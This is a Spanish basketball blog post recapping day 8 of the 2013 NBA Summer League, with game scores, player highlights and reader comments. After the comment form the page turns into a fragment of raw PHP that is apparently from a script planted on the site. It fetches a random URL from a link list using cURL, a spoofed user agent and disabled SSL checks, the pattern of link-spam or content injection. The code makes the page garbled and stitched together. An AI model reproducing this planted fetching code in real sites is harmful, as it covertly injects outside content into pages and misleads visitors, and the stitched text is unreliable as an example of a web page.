Summer Leagues: Día 8

15 de July de 2013 por rumbero

Tercer día en las Vegas y 8 partidos en juego. Abrían los Knicks que se impusieron cómodamente antes los Wizards 82-69 gracias a una buena segunda mitad y una muy mala de los de la capital. El combinado de cracks de la D-League volvía a ganar esta vez ante los Clippers 83-77 mientras unos buenos Bobcats ganaban a los Mavs 86-80 con bastante jugador que deberíamos ver durante la regular. Victoria de Lakers 81-63 ante Portland y seguidamente los Grizzlies ofrecían un auténtico festival de acierto: 18/76 en tiros de campo y 2/24 en 3P para perder (obviamente) ante los Cavs de Waiters 58-69. No mucho mejor lo hicieron los Pelicans que perdieron antes los Bucks 61-69 por ser estos últimos menos malos. Si a alguno aun le quedaban ganas de ver partidos después de estas exhibiciones quedaba la victoria de los Hawks sobre los Heat 75-71 y un buen partido para quitarse el mal sabor de boca entre Spurs y Raptors que ganaron estos últimos 76-82

DESTACADOS

Jan Vesely

10 puntos y 10 rebotes. Ya estuvo bien en el anterior pero también es cierto que los dos partidos de los Wizards han sido horribles a más no poder. ¿Hay esperanza aún para el checo?

Samardo Samuels & Reggie Bullock

Ya fueron los mejores en el primer partido de los Clippers y ayer volvieron a ser la referencia ofensiva. Sam acabó con 15 puntos y 6 rebotes mientras el rookie se iba con un 18/5 aunque algo fallón desde el triple. Bonita mecánica de tiro por eso.

cody zellerCody Zeller

Muy buen partido el suyo. 21 puntos (6/12 FG) y 13 rebotes en 32 minutos. Sin fallo desde el TL mostró algunos de sus buenos movimientos en el poste bajo. Hizo mucho daño a los Mavs.

Kidd Glichrist & Jeff Taylor

4/4 FG para MKG, que de momento parece haberse tomado en serio lo de la mejora en su tiro. Taylor volvió a estar realmente bien y seguro a nivel ofensivo con 18 puntos y 5 rebotes.

CJ McCollum

Pues mola bastante McCollum. Volvió a ser el mejor de los Blazers con 15 puntos, 5 rebotes y 5 asistencias. Buena capacidad para crearse tiros y velocidad a la hora de ejecutar las jugadas. Buena pinta.

Dion Waiters

Fallón en el primer partido, ayer el escolta les hizo un roto de los buenos a los mini ositos. 23 puntos, 4 rebotes y 4 asistencias y la sensación de que iba bastante sobrado.

Austin Rivers & Brian Roberts

Los únicos que se salvaron de los Pelicans. Entre los dos sumaron 35 puntos (hicieron 61 los de New Orleans) demostrando que cuando fallen las rodillas de Gordon pueden estar ahí.

Dennis Schröder

Buenas sensaciones las que dio el base alemán. 9 puntos, 4 rebotes, 8 asistencias, 4 robos y 3 pérdidas. Muy activo en defensa y buena visión de juego. Hay talento ahí.

valanciunasJonas Valanciunas & Terence Ross

Buen partido de los sophomores que deberían contar mucho más esta temporada con los movimientos que está habiendo en la franquicia. 14/6 para el escolta con una buena selección de tiro y 19/13 para el center aunque estuvo algo más fallón.

A SEGUIR

Tim Hardawy Jr

Tuvo que retirarse del partido a los 10 minutos por un golpe en la muñeca cuando estaba siendo de lo mejorcito. Muy agresivo en ataque acabó con 9 puntos, 2 rebotes.

Jeremy Tyler

Muy buen partido también el suyo. En 13 minutos le dió para meter 13 puntos y coger 8 rebotes. Buscando un contrato como interior de relleno.

Glen Rice Jr

No estuvo mal el partido del otro ilustre junior. 9 puntos, 5 rebotes para el de los Wizards en 18 minutos.

ottoOtto Porter

Aclimatando su juego a lo que se le pide, no ha acabado de destacar en los dos primeros partidos aunque por entrega no quedará. Fallón en el tiro 4/13 acabó con 8 puntos, 5 rebotes, 3 asistencias y 1 robo. A poco que se vaya acoplando irá a más.

Gal Mekel

Otro buen partido del base israelí. 11 puntos, 2 rebotes, 4 asistencias, 1 robo y 3 pérdidas.

Deshaun Thomas

Ya nos pusimos sobre la pista del rookie de los Spurs en la primera jornada pero es que ayer volvió a ser uno de los mejores. 16 puntos (6/9 FG) y 8 rebotes. Un soldado más para Pop.

DECEPCIONES

Ricky Ledo

Poco afortunado ayer acabó con un 1/8 y no tuvo además la mejor de las selecciones de tiro. Cogió 6 rebotes, robó 2 balones y perdió 3.

Thomas Robinson

Sin jugar un mal partido (7 puntos y 10 rebotes) necesita ser mucho más resolutivo cerca de canasta (3/12 ayer) para tener esos minutos que quiere. Puede hacerlo. Perdió 5 balones además.

John Selby

Se salió en la SL de la temporada pasada y no le dieron bola en RS. En el partido de ayer con los Lakers se fue con 1/7 FG, 3 rebotes, 1 robo y 3 pérdidas…más difícil lo va a tener aún. Una buena muestra para ver que todo lo relativo a las Summer Leagues hay que cogerlo con pinzas.

Jannis Timma & Tony Wroten

Vaya par de escopetas de feria. El backcourt de los Grizzlies se combinó para un maravilloso 2/25 FG y 0/11 3P. Lo del sophomore no tiene disculpa, está en busca de minutos pero sabiendo que el tiro no es la mayor de sus virtudes debería buscarlos por otro vía y no abusando del balón constantemente.

Comenta

9 comentarios a esta entrada

  1. arvydas dice:
    #1

    Claver esta jugando en la DL. Se sabe algo de el?

      Citar

  2. arvydas dice:
    #2

    Queria decir en la Summer League SL

      Citar

  3. MagicJohnson32 dice:
    #3

    Se dio un golpe en el cuádriceps durante el primer partido de SL, nada grave pero se tuvo que retirar y no jugó el segundo partido. No sé si volverá a jugar.

      Citar

  4. rumbero dice:
    #4

    MagicJohnson32:
    Se dio un golpe en el cuádriceps durante el primer partido de SL, nada grave pero se tuvo que retirar y no jugó el segundo partido. No sé si volverá a jugar.

    ¿Hablas de la SL o de la temporada regular en general? 😀

      Citar

  5. Esteban dice:
    #5

    extraordinario ZELLER, le falta altura y fisico, pero tiene garra, corazon y unos movimientos terribles cerca del aro
    con jefferson van a hacer una dupla ofensiva genial, en defensa van a dejar demasiado que desear

    muhammad… no da pie con bola, y menos en minesota con brewer, budinger, martin etc en el perimetro, lo que lo pòdria salvar es ser traspasado a un equipo muy malo donde pueda tirarse todas las mandarinas que quiera a ver si agarra algo de confianza, hoy lo veo muy mal

      Citar

  6. Esteban dice:
    #6

    asustan los porcentajes de goudelock, 31 putnos con 10-13 en cancha. 5-6 en triples 6-6 en libres,
    el escolta titular de los lakers?

      Citar

  7. rumbero dice:
    #7

    Esteban:
    asustan los porcentajes de goudelock, 31 putnos con 10-13 en cancha. 5-6 en triples 6-6 en libres,
    el escolta titular de los lakers?

    Es algun tipo de fenómeno paranormal lo de Goudelock en estos partidos, es que mete todo lo que le llega. Está tirando cerca al 70%..no hayq ue fiarse un pelo

      Citar

  8. Esteban dice:
    #8

    porque greg oden que tantas ganas tiene todos los años de volver a la liga no juega la liga de verano asi los equipos pueden verle en “accion”?

    una pena pero da la impresion que oden esta igual o mas roto que hace unos años, y espera poder robarse un milloncito mas antes de que nadie de un duro por el, ojala me equivoque, pero si estuviera en condiciones, minimamente tendria q jugar la liga de verano

      Citar

  9. Esteban dice:
    #9

    que patetico tirando triples mclemore, parece un crio que no tiene fuerza para llegar al aro

    no lo vieron en las practicas antes del draft lanzando desde la linea NBA? con razon bajo bastante en el draft, pero igual lanzando asi me llama la atencion que haya terminado tan arriba

    esta bien,puede necesitar un tiempo para acostumbrarse a la nueva distancia, pero no es el unico jugador que sale de la NCAA a la NBA y es al unico que le he visto semejante dificultad, no ya para encestar, sino para llegar al aro

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>